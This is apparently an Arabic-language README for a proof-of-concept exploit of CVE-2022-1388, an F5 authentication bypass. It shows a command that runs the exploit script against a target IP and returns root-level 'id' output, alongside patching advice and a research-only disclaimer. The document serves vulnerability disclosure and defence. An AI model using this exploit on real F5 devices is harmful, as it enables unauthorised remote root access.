
POC لـ CVE-2022-1388
إثبات المفهوم (POC) لثغرة CVE-2022-1388 التي تؤثر على منتجات F5 المتعددة.
يمكن العثور على تحليل فني للسبب الجذري للثغرة في مدونتنا: https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
الشروط اللازمة لطلب استغلال هذه الثغرة:
root@kali:/home/dev# python3 CVE-2022-1388.py -t 192.168.0.221 -c id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
قم بالتحديث إلى أحدث إصدار أو خفف من المخاطر باتباع التعليمات الواردة في نشرة F5 الأمنية
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا إذا كان ذلك مصرحًا به صراحةً. القائمون على المشروع غير مسؤولين عن إساءة استخدام البرنامج. استخدمه بمسؤولية.